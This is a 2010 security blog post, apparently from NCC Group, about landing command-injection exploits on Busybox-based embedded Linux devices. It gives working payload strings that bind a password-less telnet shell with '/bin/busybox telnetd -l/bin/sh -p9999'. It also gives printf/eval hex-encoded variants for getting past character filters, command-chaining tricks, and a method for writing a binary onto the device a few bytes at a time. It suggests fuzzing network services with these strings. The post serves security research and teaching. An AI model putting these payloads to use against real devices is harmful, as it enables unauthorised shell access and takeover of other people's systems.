From removed link:
https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2010/february/busybox-command-injection/
Busybox Command Injection
Linux Inside
The number of Linux-powered devices on the market is exploding. As this CCC paper points out, Linux is finding its way into everything – GPS units, television set tops, phones, routers, the works. That leaves a lot of hacking to be done, and this last month I got to spend some time with Intrepidus jailbreaking and exploiting some embedded devices. One big surprise I encountered was the difficulty of landing even simple command-injection vulnerabilities on embedded Linux.
I can’t believe it’s not Linux
The big problem with a lot of embedded Linux devices is they’re not really running Linux. If you haven’t heard of Busybox before, it’s the core functionality of Linux condensed into a single multi-call binary. Busybox offers embedded device developers a simple distribution of Linux without the large filesize footprint and complexity of porting a full Linux toolchain to embedded hardware. From a hacker’s perspective, an embedded Busybox install can pose some unique challenges, especially if you’re throwing your exploit “blind”, without the ability to see error messages:
- busybox’s ash shell lacks the full functionality of bash and other shells
- busybox’s available functionality depends on compile options chosen by the developers, so every device has the potential to pose unique challenges
- busybox’s implementation of most commands has slightly different functionality and different command line flags than the corresponding Linux versions
- Standard pipe-redirect callback shells often fail; in fact, I’ve never gotten a standard two-window “telnet | ash | telnet” shell to work on busybox.
What’s Command Injection?
Command injection vulnerabilities are usually some of the simplest exploits to land, requiring no assembly and only a little shell knowledge. They can occur whenever developers use user-supplied data as an argument to a shell command. This can happen in a number of ways, and writing a complete reference on all the ways this type of bug can manifest itself is a large topic; OWASP has a good writeup on programmatic (system call) command injection. This writeup isn’t about how injection works; it’s about how you can exploit injection on busybox. Here’s where things get weird.
busybox sh
BusyBox v1.1.3 Built-in shell (ash)
Enter ‘help’ for a list of built-in commands.
~ $ ping 127.0.0.1
ping: permission denied. (are you root?)
Busybox isn’t quite Linux! If you are attempting to find or exploit a “blind” command injection vuln and the target process is not a superuser process, using ping to “beacon” out to your attack box won’t work, because on busybox ping requires superuser privs. Telnet is a better beacon choice, as it is part of the default build process and must be manually removed.
Chaining Commands: Nothing New Here
The basics of adding execution to an input argument don’t change much with busybox’s shell:
~ $ true;echo Execution Execution ~ $ false;echo Execution Execution ~ $ true|echo Execution Execution ~ $ false|echo Execution Execution ~ $ false||echo Execution Execution ~ $ true&&echo Execution Execution ~ $ echo `echo Execution` Execution ~ $ echo $(echo Execution) Execution
Getting Access
The absolute easiest way to try to get access to a busybox install via command injection is telnetd. Busybox’s telnetd is different: on a normal telnetd install the “-l” flag enables line mode, but on busybox, -l specifies the command to use to challenge the user. That means if you specify the busybox shell, you get a shell without a user/pass prompt:
telnetd -l/bin/sh
That’s the shortest possible string that can land a shell on a busybox system. Of course, here’s where things get tricky. If telnet is already open, this will fail; it will also fail to bind a priveleged port when run as a non-root user. Finally, if the environment does not contain a valid path value, the command will fail.
/bin/busybox telnetd -l/bin/sh -p9999
The command above will bind a telnet shell to port 9999 without a path value and without running as root. Of course, now things get difficult.
Restrictions
Sample exploit conditions are always easy to land and never have anything annoying in the way like character filters or buffer lengths. The real world is different; exploitation often requires circumventing limitations. As far as length goes, the commands above pretty much cover the shortest possible exploit strings. Character set limitations are a different story. Embedded device character set limitations can be pretty heavy duty, enforced by on-screen-keyboards, security character filters, and other methods. A common limitation is space-bounded copy, generated by a tokenizer which clips a supplied argument to everything up to the first instance of whitespace. Here are some ways to work around these limitations:
~ $ echo -e x7cx7cx2e ||. ~ $ printf x7cx2ex0a |.
Busybox supports evaluation of slash-escaped characters both using echo and the shell builtin printf. This can be used to encode a lot of the characters that are often stripped. Different execution methods require different levels of escaping. Here are some combinations that work; note that I have included the command “true” to show where a successful system command would lie in the overall exploit.
true|/bin/busybox telnetd -l/bin/sh -p9999 # Character set required: -/
true|eval $(printf telnetd\\x20\\x2dl\\x2fbin\\x2fsh\\x20\\x2dp9999)
# Character set required: $()\
true|eval `printf telnetd\\\\x20\\\\x2dl\\\\x2fbin\\\\x2fsh\\\\x20\\\\x2dp9999`
# Character set required: `\
If you’re attempting to jailbreak a potential busybox device, and you’re fuzzing a net-facing service, the strings above coupled with a good [&& / || / | / ; / $() / ``] regular expression should get you started; just monitor port 9999. If you manage to land on a device with the methods I’ve listed here, drop me a line and let me know how it went down. If you’re determined to drop a binary on the device a few bytes at a time, this should get you started:
eval echo -n $(echo -e -n xdexadxbexef $(printf x3ex3ex2ftmpx2fig))
Notes on Other Exploit Methods
There are plenty of ways to get onto a Unix-based system like busybox other than binding a shell, however often embedded devices have unique restrictions. Concatenating a user you control to etc passwd can silently fail on a readonly filesystem, a very common occurrence on embedded devices. Concatenating binaries from the shell requires precise knowledge of the architecture target type. And when you’re jailbreaking, failure is almost universally silent. Good luck,
-stryde.hax
Published date: 24 February 2010
Written by: strydehax